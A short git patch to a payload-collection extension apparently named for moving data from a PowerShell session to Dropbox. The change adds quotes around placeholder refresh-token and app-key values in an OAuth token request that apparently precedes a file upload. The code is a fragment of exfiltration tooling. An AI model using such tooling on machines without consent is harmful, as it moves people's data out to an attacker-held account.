From 510c6dadf6ee07e22baa8fdce9f8aa72fe59ff61 Mon Sep 17 00:00:00 2001 From: Julien M <157210867+PlumpyTurkey@users.noreply.github.com> Date: Tue, 4 Jun 2024 12:28:22 +0200 Subject: [PATCH] Add missing quotes --- payloads/extensions/community/POWERSHELL_TO_DROPBOX | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/payloads/extensions/community/POWERSHELL_TO_DROPBOX b/payloads/extensions/community/POWERSHELL_TO_DROPBOX index 8fe6ef4..4ac824b 100644 --- a/payloads/extensions/community/POWERSHELL_TO_DROPBOX +++ b/payloads/extensions/community/POWERSHELL_TO_DROPBOX @@ -26,9 +26,9 @@ EXTENSION POWERSHELL_TO_DROPBOX "Content-Type" = "application/x-www-form-urlencoded" } -Body @{ "grant_type" = "refresh_token"; - "refresh_token" = #PTD_REFRESH_TOKEN; - "client_id" = #PTD_APP_KEY; - "client_secret" = #PTD_APP_SECRET + "refresh_token" = "#PTD_REFRESH_TOKEN"; + "client_id" = "#PTD_APP_KEY"; + "client_secret" = "#PTD_APP_SECRET" } ).access_token)"; "Content-Type" = "application/octet-stream";